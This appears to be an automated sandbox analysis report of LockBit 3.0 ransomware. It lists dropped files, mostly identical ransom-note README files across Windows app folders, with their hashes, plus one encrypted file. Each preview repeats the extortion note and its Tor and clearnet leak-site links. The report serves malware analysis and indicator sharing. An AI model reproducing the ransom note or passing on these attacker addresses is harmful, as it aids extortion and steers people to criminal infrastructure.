                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977360692617594
                Encrypted:false
                SSDEEP:192:vVboxaFO5Um29TAINBg4je//LN/7uCsQMEJX3aEB9so:tcxaFU2bgQeLNTu5QMEJ6EB9F
                MD5:F6F0DCE31691E095336E9EBCEF147F01
                SHA1:BC32B8DB7930E2DA0701D9A97C87FA87216FC7E0
                SHA-256:ABE9EF0BC25D97A4941254B4B8A53B189BF4070CD3F33A17136549725EE4CED3
                SHA-512:3EB7F56F107315A1FC880CBD2BCA33BD32AB998B09466861AEA3B463484F111011A6FE9AD3BD5FCB22909399243A5E7F1DCF7D971164B3DAFB6D3C29158CBDFC
                Malicious:false
                Preview:..._...$c...\w..~.....'a.W.r.~...v..H..C..8.....l/ ...EO..!....h.D.j.M.....I]r:!.t.....r..R.w....t......r.Gd.L.VR.E.............,X..P./S..X.6{......u.0f...2.!X,..O.0Zv*..<..;(i.......g3\y?.>..g.....cr. ...fEp6:+...>..Ui4.....\....c.(......j..2....:9.d..-.y&M.&.....4.1..k..34.aD.....~a$7.....-.2..........(+.....".....>I..N..DWa..k.....3........U..Xb.?....A....%..{Z....f....z.>..`...W.P>A....G..i.Y...5..D.nJ.}.............y....d..M....f...5..v .h:a.f...#...s...._5].7.<RU...=..7..;..s...8..L.a.#te.An.(.m...,y..E.i.w.....0...`.....t.z.Q....%..8.Z...,. -&sm.Y..".......=.....4..F..i.k}.P.s..%=..^....w6v>8.>lmo.u............+ y..#........u.<?.. ..ZM.....z@...P....]w4...6...i.....A....A)...?.r..z. .=.....x..D...k#..fM..->rn..c.N..M3.af..B!.U....>...s..hL...q...'[...AJ._!..T.G...[..>Y.{..?m....?O[..V..../.E.^C6..i.....<6...$1U....G..%.......<....].?.QN..Q_..[.5..@.X......|.....E....'q7.].i..J..3A....YY.....4H...I&....3...R..z..*...{1....5.MQ.6-

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
